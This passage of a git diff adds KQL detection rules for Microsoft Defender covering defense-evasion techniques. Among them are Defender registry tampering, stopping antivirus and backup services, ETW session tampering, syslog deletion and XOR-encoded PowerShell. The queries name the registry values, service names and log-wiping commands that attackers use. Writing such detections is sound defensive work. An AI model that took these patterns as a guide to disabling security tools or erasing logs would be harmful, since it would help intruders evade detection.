indicate suspicious activity. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1490 + +DeviceImageLoadEvents +| where FolderPath endswith "\\vss_ps.dll" and (not((isnull(InitiatingProcessFolderPath) or ((InitiatingProcessFolderPath endswith "\\clussvc.exe" or InitiatingProcessFolderPath endswith "\\dismhost.exe" or InitiatingProcessFolderPath endswith "\\dllhost.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\appcmd.exe" or InitiatingProcessFolderPath endswith "\\inetsrv\\iissetup.exe" or InitiatingProcessFolderPath endswith "\\msiexec.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\searchindexer.exe" or InitiatingProcessFolderPath endswith "\\srtasks.exe" or InitiatingProcessFolderPath endswith "\\svchost.exe" or InitiatingProcessFolderPath endswith "\\System32\\SystemPropertiesAdvanced.exe" or InitiatingProcessFolderPath endswith "\\taskhostw.exe" or InitiatingProcessFolderPath endswith "\\thor.exe" or InitiatingProcessFolderPath endswith "\\thor64.exe" or InitiatingProcessFolderPath endswith "\\tiworker.exe" or InitiatingProcessFolderPath endswith "\\vssvc.exe" or InitiatingProcessFolderPath endswith "\\vssadmin.exe" or InitiatingProcessFolderPath endswith "\\WmiPrvSE.exe" or InitiatingProcessFolderPath endswith "\\wsmprovhost.exe") and InitiatingProcessFolderPath startswith "C:\\Windows\\") or (InitiatingProcessCommandLine contains "\\dismhost.exe {" and InitiatingProcessCommandLine startswith "C:\\$WinREAgent\\Scratch\\")))) and (not((InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql new file mode 100644 index 00000000..6a7a594d --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_volume_shadow_copy_vssapi_dll_load.kql @@ -0,0 +1,10 @@ +// Title: Suspicious Volume Shadow Copy Vssapi.dll Load +// Author: frack113 +// Date: 2022-10-31 +// Level: high +// Description: Detects the image load of VSS DLL by uncommon executables +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1490 + +DeviceImageLoadEvents +| where FolderPath endswith "\\vssapi.dll" and (not((isnull(InitiatingProcessFolderPath) or (InitiatingProcessFolderPath startswith "C:\\Program Files\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\") or ((InitiatingProcessFolderPath in~ ("C:\\Windows\\explorer.exe", "C:\\Windows\\ImmersiveControlPanel\\SystemSettings.exe")) or (InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\Temp\\{" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\"))))) and (not(((InitiatingProcessFolderPath contains "\\temp\\is-" and InitiatingProcessFolderPath contains "\\avira_system_speedup.tmp") or InitiatingProcessFolderPath startswith "C:\\ProgramData\\Package Cache\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql b/KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql new file mode 100644 index 00000000..aed0ddc8 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_vsls_agent_command_with_agentextensionpath_load.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Vsls-Agent Command With AgentExtensionPath Load +// Author: bohops +// Date: 2022-10-30 +// Level: medium +// Description: Detects Microsoft Visual Studio vsls-agent.exe lolbin execution with a suspicious library load using the --agentExtensionPath parameter +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - False positives depend on custom use of vsls-agent.exe + +DeviceProcessEvents +| where (ProcessCommandLine contains "--agentExtensionPath" and FolderPath endswith "\\vsls-agent.exe") and (not(ProcessCommandLine contains "Microsoft.VisualStudio.LiveShare.Agent.")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql b/KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql new file mode 100644 index 00000000..807e3a4e --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_windows_defender_folder_exclusion_added_via_reg_exe.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE +// Author: frack113 +// Date: 2022-02-13 +// Level: medium +// Description: Detects the usage of "reg.exe" to add Defender folder exclusions. Qbot has been seen using this technique to add exclusions for folders within AppData and ProgramData. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Legitimate use + +DeviceProcessEvents +| where (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\Paths" or ProcessCommandLine contains "SOFTWARE\\Microsoft\\Microsoft Antimalware\\Exclusions\\Paths") and (ProcessCommandLine contains "ADD " and ProcessCommandLine contains "/t " and ProcessCommandLine contains "REG_DWORD " and ProcessCommandLine contains "/v " and ProcessCommandLine contains "/d " and ProcessCommandLine contains "0") and FolderPath endswith "\\reg.exe" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql b/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql new file mode 100644 index 00000000..3e986e69 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_windows_defender_registry_key_tampering_via_reg_exe.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Windows Defender Registry Key Tampering Via Reg.EXE +// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-03-22 +// Level: high +// Description: Detects the usage of "reg.exe" to tamper with different Windows Defender registry keys in order to disable some important features related to protection and detection + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Rare legitimate use by administrators to test software (should always be investigated) + +DeviceProcessEvents +| where ((FolderPath endswith "\\reg.exe" or ProcessVersionInfoOriginalFileName =~ "reg.exe") and (ProcessCommandLine contains "SOFTWARE\\Microsoft\\Windows Defender\\" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender Security Center" or ProcessCommandLine contains "SOFTWARE\\Policies\\Microsoft\\Windows Defender\\")) and (((ProcessCommandLine contains "DisallowExploitProtectionOverride" or ProcessCommandLine contains "EnableControlledFolderAccess" or ProcessCommandLine contains "MpEnablePus" or ProcessCommandLine contains "PUAProtection" or ProcessCommandLine contains "SpynetReporting" or ProcessCommandLine contains "SubmitSamplesConsent" or ProcessCommandLine contains "TamperProtection") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 0")) or ((ProcessCommandLine contains "DisableAccess" or ProcessCommandLine contains "DisableAntiSpyware" or ProcessCommandLine contains "DisableAntiSpywareRealtimeProtection" or ProcessCommandLine contains "DisableAntiVirus" or ProcessCommandLine contains "DisableAntiVirusSignatures" or ProcessCommandLine contains "DisableArchiveScanning" or ProcessCommandLine contains "DisableBehaviorMonitoring" or ProcessCommandLine contains "DisableBlockAtFirstSeen" or ProcessCommandLine contains "DisableCloudProtection" or ProcessCommandLine contains "DisableConfig" or ProcessCommandLine contains "DisableEnhancedNotifications" or ProcessCommandLine contains "DisableIntrusionPreventionSystem" or ProcessCommandLine contains "DisableIOAVProtection" or ProcessCommandLine contains "DisableNetworkProtection" or ProcessCommandLine contains "DisableOnAccessProtection" or ProcessCommandLine contains "DisablePrivacyMode" or ProcessCommandLine contains "DisableRealtimeMonitoring" or ProcessCommandLine contains "DisableRoutinelyTakingAction" or ProcessCommandLine contains "DisableScanOnRealtimeEnable" or ProcessCommandLine contains "DisableScriptScanning" or ProcessCommandLine contains "DisableSecurityCenter" or ProcessCommandLine contains "Notification_Suppress" or ProcessCommandLine contains "SignatureDisableUpdateOnStartupWithoutEngine") and (ProcessCommandLine contains " add " and ProcessCommandLine contains "d 1"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql b/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql new file mode 100644 index 00000000..6a22e04a --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_windows_service_tampering.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Windows Service Tampering +// Author: Nasreddine Bencherchali (Nextron Systems), frack113 , X__Junior (Nextron Systems) +// Date: 2022-09-01 +// Level: high +// Description: Detects the usage of binaries such as 'net', 'sc' or 'powershell' in order to stop, pause, disable or delete critical or important Windows services such as AV, Backup, etc. As seen being used in some ransomware scripts + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.impact, attack.t1489, attack.t1562.001 +// False Positives: +// - Administrators or tools shutting down the services due to upgrade or removal purposes. If you experience some false positive, please consider adding filters to the parent process launching this command and not removing the entry + +DeviceProcessEvents +| where (ProcessCommandLine contains "143Svc" or ProcessCommandLine contains "Acronis VSS Provider" or ProcessCommandLine contains "AcronisAgent" or ProcessCommandLine contains "AcrSch2Svc" or ProcessCommandLine contains "AdobeARMservice" or ProcessCommandLine contains "AHS Service" or ProcessCommandLine contains "Antivirus" or ProcessCommandLine contains "Apache4" or ProcessCommandLine contains "ARSM" or ProcessCommandLine contains "aswBcc" or ProcessCommandLine contains "AteraAgent" or ProcessCommandLine contains "Avast Business Console Client Antivirus Service" or ProcessCommandLine contains "avast! Antivirus" or ProcessCommandLine contains "AVG Antivirus" or ProcessCommandLine contains "avgAdminClient" or ProcessCommandLine contains "AvgAdminServer" or ProcessCommandLine contains "AVP1" or ProcessCommandLine contains "BackupExec" or ProcessCommandLine contains "bedbg" or ProcessCommandLine contains "BITS" or ProcessCommandLine contains "BrokerInfrastructure" or ProcessCommandLine contains "CASLicenceServer" or ProcessCommandLine contains "CASWebServer" or ProcessCommandLine contains "Client Agent 7.60" or ProcessCommandLine contains "Core Browsing Protection" or ProcessCommandLine contains "Core Mail Protection" or ProcessCommandLine contains "Core Scanning Server" or ProcessCommandLine contains "DCAgent" or ProcessCommandLine contains "dwmrcs" or ProcessCommandLine contains "EhttpSr" or ProcessCommandLine contains "ekrn" or ProcessCommandLine contains "Enterprise Client Service" or ProcessCommandLine contains "epag" or ProcessCommandLine contains "EPIntegrationService" or ProcessCommandLine contains "EPProtectedService" or ProcessCommandLine contains "EPRedline" or ProcessCommandLine contains "EPSecurityService" or ProcessCommandLine contains "EPUpdateService" or ProcessCommandLine contains "EraserSvc11710" or ProcessCommandLine contains "EsgShKernel" or ProcessCommandLine contains "ESHASRV" or ProcessCommandLine contains "FA_Scheduler" or ProcessCommandLine contains "FirebirdGuardianDefaultInstance" or ProcessCommandLine contains "FirebirdServerDefaultInstance" or ProcessCommandLine contains "FontCache3.0.0.0" or ProcessCommandLine contains "HealthTLService" or ProcessCommandLine contains "hmpalertsvc" or ProcessCommandLine contains "HMS" or ProcessCommandLine contains "HostControllerService" or ProcessCommandLine contains "hvdsvc" or ProcessCommandLine contains "IAStorDataMgrSvc" or ProcessCommandLine contains "IBMHPS" or ProcessCommandLine contains "ibmspsvc" or ProcessCommandLine contains "IISAdmin" or ProcessCommandLine contains "IMANSVC" or ProcessCommandLine contains "IMAP4Svc" or ProcessCommandLine contains "instance2" or ProcessCommandLine contains "KAVFS" or ProcessCommandLine contains "KAVFSGT" or ProcessCommandLine contains "kavfsslp" or ProcessCommandLine contains "KeyIso" or ProcessCommandLine contains "klbackupdisk" or ProcessCommandLine contains "klbackupflt" or ProcessCommandLine contains "klflt" or ProcessCommandLine contains "klhk" or ProcessCommandLine contains "KLIF" or ProcessCommandLine contains "klim6" or ProcessCommandLine contains "klkbdflt" or ProcessCommandLine contains "klmouflt" or ProcessCommandLine contains "klnagent" or ProcessCommandLine contains "klpd" or ProcessCommandLine contains "kltap" or ProcessCommandLine contains "KSDE1.0.0" or ProcessCommandLine contains "LogProcessorService" or ProcessCommandLine contains "M8EndpointAgent" or ProcessCommandLine contains "macmnsvc" or ProcessCommandLine contains "masvc" or ProcessCommandLine contains "MBAMService" or ProcessCommandLine contains "MBCloudEA" or ProcessCommandLine contains "MBEndpointAgent" or ProcessCommandLine contains "McAfeeDLPAgentService" or ProcessCommandLine contains "McAfeeEngineService" or ProcessCommandLine contains "MCAFEEEVENTPARSERSRV" or ProcessCommandLine contains "McAfeeFramework" or ProcessCommandLine contains "MCAFEETOMCATSRV530" or ProcessCommandLine contains "McShield" or ProcessCommandLine contains "McTaskManager" or ProcessCommandLine contains "mfefire" or ProcessCommandLine contains "mfemms" or ProcessCommandLine contains "mfevto" or ProcessCommandLine contains "mfevtp" or ProcessCommandLine contains "mfewc" or ProcessCommandLine contains "MMS" or ProcessCommandLine contains "mozyprobackup" or ProcessCommandLine contains "mpssvc" or ProcessCommandLine contains "MSComplianceAudit" or ProcessCommandLine contains "MSDTC" or ProcessCommandLine contains "MsDtsServer" or ProcessCommandLine contains "MSExchange" or ProcessCommandLine contains "msftesq1SPROO" or ProcessCommandLine contains "msftesql$PROD" or ProcessCommandLine contains "msftesql$SQLEXPRESS" or ProcessCommandLine contains "MSOLAP$SQL_2008" or ProcessCommandLine contains "MSOLAP$SYSTEM_BGC" or ProcessCommandLine contains "MSOLAP$TPS" or ProcessCommandLine contains "MSOLAP$TPSAMA" or ProcessCommandLine contains "MSOLAPSTPS" or ProcessCommandLine contains "MSOLAPSTPSAMA" or ProcessCommandLine contains "mssecflt" or ProcessCommandLine contains "MSSQ!I.SPROFXENGAGEMEHT" or ProcessCommandLine contains "MSSQ0SHAREPOINT" or ProcessCommandLine contains "MSSQ0SOPHOS" or ProcessCommandLine contains "MSSQL" or ProcessCommandLine contains "MSSQLFDLauncher$" or ProcessCommandLine contains "MySQL" or ProcessCommandLine contains "NanoServiceMain" or ProcessCommandLine contains "NetMsmqActivator" or ProcessCommandLine contains "NetPipeActivator" or ProcessCommandLine contains "netprofm" or ProcessCommandLine contains "NetTcpActivator" or ProcessCommandLine contains "NetTcpPortSharing" or ProcessCommandLine contains "ntrtscan" or ProcessCommandLine contains "nvspwmi" or ProcessCommandLine contains "ofcservice" or ProcessCommandLine contains "Online Protection System" or ProcessCommandLine contains "OracleClientCache80" or ProcessCommandLine contains "OracleDBConsole" or ProcessCommandLine contains "OracleMTSRecoveryService" or ProcessCommandLine contains "OracleOraDb11g_home1" or ProcessCommandLine contains "OracleService" or ProcessCommandLine contains "OracleVssWriter" or ProcessCommandLine contains "osppsvc" or ProcessCommandLine contains "PandaAetherAgent" or ProcessCommandLine contains "PccNTUpd" or ProcessCommandLine contains "PDVFSService" or ProcessCommandLine contains "POP3Svc" or ProcessCommandLine contains "postgresql-x64-9.4" or ProcessCommandLine contains "POVFSService" or ProcessCommandLine contains "PSUAService" or ProcessCommandLine contains "Quick Update Service" or ProcessCommandLine contains "RepairService" or ProcessCommandLine contains "ReportServer" or ProcessCommandLine contains "ReportServer$" or ProcessCommandLine contains "RESvc" or ProcessCommandLine contains "RpcEptMapper" or ProcessCommandLine contains "sacsvr" or ProcessCommandLine contains "SamSs" or ProcessCommandLine contains "SAVAdminService" or ProcessCommandLine contains "SAVService" or ProcessCommandLine contains "ScSecSvc" or ProcessCommandLine contains "SDRSVC" or ProcessCommandLine contains "SearchExchangeTracing" or ProcessCommandLine contains "sense" or ProcessCommandLine contains "SentinelAgent" or ProcessCommandLine contains "SentinelHelperService" or ProcessCommandLine contains "SepMasterService" or ProcessCommandLine contains "ShMonitor" or ProcessCommandLine contains "Smcinst" or ProcessCommandLine contains "SmcService" or ProcessCommandLine contains "SMTPSvc" or ProcessCommandLine contains "SNAC" or ProcessCommandLine contains "SntpService" or ProcessCommandLine contains "Sophos" or ProcessCommandLine contains "SQ1SafeOLRService" or ProcessCommandLine contains "SQL Backups" or ProcessCommandLine contains "SQL Server" or ProcessCommandLine contains "SQLAgent" or ProcessCommandLine contains "SQLANYs_Sage_FAS_Fixed_Assets" or ProcessCommandLine contains "SQLBrowser" or ProcessCommandLine contains "SQLsafe" or ProcessCommandLine contains "SQLSERVERAGENT" or ProcessCommandLine contains "SQLTELEMETRY" or ProcessCommandLine contains "SQLWriter" or ProcessCommandLine contains "SSISTELEMETRY130" or ProcessCommandLine contains "SstpSvc" or ProcessCommandLine contains "storflt" or ProcessCommandLine contains "svcGenericHost" or ProcessCommandLine contains "swc_service" or ProcessCommandLine contains "swi_filter" or ProcessCommandLine contains "swi_service" or ProcessCommandLine contains "swi_update" or ProcessCommandLine contains "Symantec" or ProcessCommandLine contains "sysmon" or ProcessCommandLine contains "TeamViewer" or ProcessCommandLine contains "Telemetryserver" or ProcessCommandLine contains "ThreatLockerService" or ProcessCommandLine contains "TMBMServer" or ProcessCommandLine contains "TmCCSF" or ProcessCommandLine contains "TmFilter" or ProcessCommandLine contains "TMiCRCScanService" or ProcessCommandLine contains "tmlisten" or ProcessCommandLine contains "TMLWCSService" or ProcessCommandLine contains "TmPfw" or ProcessCommandLine contains "TmPreFilter" or ProcessCommandLine contains "TmProxy" or ProcessCommandLine contains "TMSmartRelayService" or ProcessCommandLine contains "tmusa" or ProcessCommandLine contains "Tomcat" or ProcessCommandLine contains "Trend Micro Deep Security Manager" or ProcessCommandLine contains "TrueKey" or ProcessCommandLine contains "UFNet" or ProcessCommandLine contains "UI0Detect" or ProcessCommandLine contains "UniFi" or ProcessCommandLine contains "UTODetect" or ProcessCommandLine contains "vds" or ProcessCommandLine contains "Veeam" or ProcessCommandLine contains "VeeamDeploySvc" or ProcessCommandLine contains "Veritas System Recovery" or ProcessCommandLine contains "vmic" or ProcessCommandLine contains "VMTools" or ProcessCommandLine contains "vmvss" or ProcessCommandLine contains "VSApiNt" or ProcessCommandLine contains "VSS" or ProcessCommandLine contains "W3Svc" or ProcessCommandLine contains "wbengine" or ProcessCommandLine contains "WdNisSvc" or ProcessCommandLine contains "WeanClOudSve" or ProcessCommandLine contains "Weems JY" or ProcessCommandLine contains "WinDefend" or ProcessCommandLine contains "wmms" or ProcessCommandLine contains "wozyprobackup" or ProcessCommandLine contains "WPFFontCache_v0400" or ProcessCommandLine contains "WRSVC" or ProcessCommandLine contains "wsbexchange" or ProcessCommandLine contains "WSearch" or ProcessCommandLine contains "wscsvc" or ProcessCommandLine contains "Zoolz 2 Service") and ((ProcessCommandLine contains " delete " or ProcessCommandLine contains ".delete()" or ProcessCommandLine contains " pause " or ProcessCommandLine contains " stop " or ProcessCommandLine contains "Stop-Service " or ProcessCommandLine contains "Remove-Service ") or (ProcessCommandLine contains "config" and ProcessCommandLine contains "start=disabled")) and ((ProcessVersionInfoOriginalFileName in~ ("net.exe", "net1.exe", "PowerShell_ISE.EXE", "PowerShell.EXE", "psservice.exe", "pwsh.dll", "sc.exe", "wmic.exe")) or (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\PowerShell_ISE.EXE" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\PsService.exe" or FolderPath endswith "\\PsService64.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\sc.exe" or FolderPath endswith "\\wmic.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql b/KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql new file mode 100644 index 00000000..3ca2bf94 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_windows_trace_etw_session_tamper_via_logman_exe.kql @@ -0,0 +1,13 @@ +// Title: Suspicious Windows Trace ETW Session Tamper Via Logman.EXE +// Author: Florian Roth (Nextron Systems) +// Date: 2021-02-11 +// Level: high +// Description: Detects the execution of "logman" utility in order to disable or delete Windows trace sessions +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001, attack.t1070.001 +// False Positives: +// - Legitimate deactivation by administrative staff +// - Installer tools that disable services, e.g. before log collection agent installation + +DeviceProcessEvents +| where (ProcessCommandLine contains "stop " or ProcessCommandLine contains "delete ") and (FolderPath endswith "\\logman.exe" or ProcessVersionInfoOriginalFileName =~ "Logman.exe") and (ProcessCommandLine contains "Circular Kernel Context Logger" or ProcessCommandLine contains "EventLog-" or ProcessCommandLine contains "SYSMON TRACE" or ProcessCommandLine contains "SysmonDnsEtwSession") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql b/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql new file mode 100644 index 00000000..001bb487 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_windows_update_agent_empty_cmdline.kql @@ -0,0 +1,11 @@ +// Title: Suspicious Windows Update Agent Empty Cmdline +// Author: Florian Roth (Nextron Systems) +// Date: 2022-02-26 +// Level: high +// Description: Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1036 + +DeviceProcessEvents +| where (ProcessCommandLine endswith "Wuauclt" or ProcessCommandLine endswith "Wuauclt.exe") and (FolderPath endswith "\\Wuauclt.exe" or ProcessVersionInfoOriginalFileName =~ "Wuauclt.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql b/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql new file mode 100644 index 00000000..092d7cfc --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_wordpad_outbound_connections.kql @@ -0,0 +1,14 @@ +// Title: Suspicious Wordpad Outbound Connections +// Author: X__Junior (Nextron Systems) +// Date: 2023-07-12 +// Level: medium +// Description: Detects a network connection initiated by "wordpad.exe" over uncommon destination ports. +This might indicate potential process injection activity from a beacon or similar mechanisms. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.command-and-control +// False Positives: +// - Other ports can be used, apply additional filters accordingly + +DeviceNetworkEvents +| where InitiatingProcessFolderPath endswith "\\wordpad.exe" and (not((RemotePort in~ ("80", "139", "443", "445", "465", "587", "993", "995")))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql b/KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql new file mode 100644 index 00000000..44ca426a --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_workstation_locking_via_rundll32.kql @@ -0,0 +1,12 @@ +// Title: Suspicious Workstation Locking via Rundll32 +// Author: frack113 +// Date: 2022-06-04 +// Level: medium +// Description: Detects a suspicious call to the user32.dll function that locks the user workstation +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion +// False Positives: +// - Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option + +DeviceProcessEvents +| where ProcessCommandLine contains "user32.dll," and (FolderPath endswith "\\rundll32.exe" or ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE") and InitiatingProcessFolderPath endswith "\\cmd.exe" and ProcessCommandLine contains "LockWorkStation" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql b/KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql new file mode 100644 index 00000000..5d55774c --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_x509enrollment_process_creation.kql @@ -0,0 +1,12 @@ +// Title: Suspicious X509Enrollment - Process Creation +// Author: frack113 +// Date: 2022-12-23 +// Level: medium +// Description: Detect use of X509Enrollment +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1553.004 +// False Positives: +// - Legitimate administrative script + +DeviceProcessEvents +| where ProcessCommandLine contains "X509Enrollment.CBinaryConverter" or ProcessCommandLine contains "884e2002-217d-11da-b2a4-000e7bbb2b09" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql b/KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql new file mode 100644 index 00000000..2b07c6b5 --- /dev/null +++ b/KQL/rules/Defense Evasion/suspicious_xor_encoded_powershell_command.kql @@ -0,0 +1,10 @@ +// Title: Suspicious XOR Encoded PowerShell Command +// Author: Sami Ruohonen, Harish Segar, Tim Shelton, Teymur Kheirkhabarov, Vasiliy Burov, oscd.community, Nasreddine Bencherchali +// Date: 2018-09-05 +// Level: medium +// Description: Detects presence of a potentially xor encoded powershell command +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.execution, attack.t1059.001, attack.t1140, attack.t1027 + +DeviceProcessEvents +| where (ProcessCommandLine contains "ForEach" or ProcessCommandLine contains "for(" or ProcessCommandLine contains "for " or ProcessCommandLine contains "-join " or ProcessCommandLine contains "-join'" or ProcessCommandLine contains "-join\"" or ProcessCommandLine contains "-join`" or ProcessCommandLine contains "::Join" or ProcessCommandLine contains "[char]") and ProcessCommandLine contains "bxor" and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll")) or ProcessVersionInfoFileDescription =~ "Windows PowerShell" or ProcessVersionInfoProductName =~ "PowerShell Core 6") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql b/KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql new file mode 100644 index 00000000..d379c122 --- /dev/null +++ b/KQL/rules/Defense Evasion/syncappvpublishingserver_execute_arbitrary_powershell_code.kql @@ -0,0 +1,12 @@ +// Title: SyncAppvPublishingServer Execute Arbitrary PowerShell Code +// Author: frack113 +// Date: 2021-07-12 +// Level: medium +// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.exe. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218 +// False Positives: +// - App-V clients + +DeviceProcessEvents +| where ProcessCommandLine contains "\"n; " and (FolderPath endswith "\\SyncAppvPublishingServer.exe" or ProcessVersionInfoOriginalFileName =~ "syncappvpublishingserver.exe") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql b/KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql new file mode 100644 index 00000000..9810ca56 --- /dev/null +++ b/KQL/rules/Defense Evasion/syncappvpublishingserver_vbs_execute_arbitrary_powershell_code.kql @@ -0,0 +1,10 @@ +// Title: SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code +// Author: frack113 +// Date: 2021-07-16 +// Level: medium +// Description: Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1218, attack.t1216 + +DeviceProcessEvents +| where ProcessCommandLine contains "\\SyncAppvPublishingServer.vbs" and ProcessCommandLine contains ";" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql b/KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql new file mode 100644 index 00000000..8e98a66b --- /dev/null +++ b/KQL/rules/Defense Evasion/sysinternals_pssuspend_suspicious_execution.kql @@ -0,0 +1,12 @@ +// Title: Sysinternals PsSuspend Suspicious Execution +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2023-03-23 +// Level: high +// Description: Detects suspicious execution of Sysinternals PsSuspend, where the utility is used to suspend critical processes such as AV or EDR to bypass defenses +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1562.001 +// False Positives: +// - Unlikely + +DeviceProcessEvents +| where ProcessCommandLine contains "msmpeng.exe" and (ProcessVersionInfoOriginalFileName =~ "pssuspend.exe" or (FolderPath endswith "\\pssuspend.exe" or FolderPath endswith "\\pssuspend64.exe")) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql b/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql new file mode 100644 index 00000000..6b453a5d --- /dev/null +++ b/KQL/rules/Defense Evasion/syslog_clearing_or_removal_via_system_utilities.kql @@ -0,0 +1,14 @@ +// Title: Syslog Clearing or Removal Via System Utilities +// Author: Max Altgelt (Nextron Systems), Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC +// Date: 2021-10-15 +// Level: high +// Description: Detects specific commands commonly used to remove or empty the syslog. Which is a technique often used by attacker as a method to hide their tracks + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1070.002 +// False Positives: +// - Log rotation. +// - Maintenance. + +DeviceProcessEvents +| where (ProcessCommandLine contains "/var/log/syslog" and ((ProcessCommandLine contains "/dev/null" and FolderPath endswith "/cp") or ((ProcessCommandLine contains "-sf " or ProcessCommandLine contains "-sfn " or ProcessCommandLine contains "-sfT ") and (ProcessCommandLine contains "/dev/null " and ProcessCommandLine contains "/var/log/syslog") and FolderPath endswith "/ln") or FolderPath endswith "/mv" or ((ProcessCommandLine contains " -r " or ProcessCommandLine contains " -f " or ProcessCommandLine contains " -rf " or ProcessCommandLine contains "/var/log/syslog") and FolderPath endswith "/rm") or (ProcessCommandLine contains "-u " and FolderPath endswith "/shred") or ((ProcessCommandLine contains "-s " or ProcessCommandLine contains "-c " or ProcessCommandLine contains "--size") and (ProcessCommandLine contains "0 " and ProcessCommandLine contains "/var/log/syslog") and FolderPath endswith "/truncate") or FolderPath endswith "/unlink")) or ((ProcessCommandLine contains 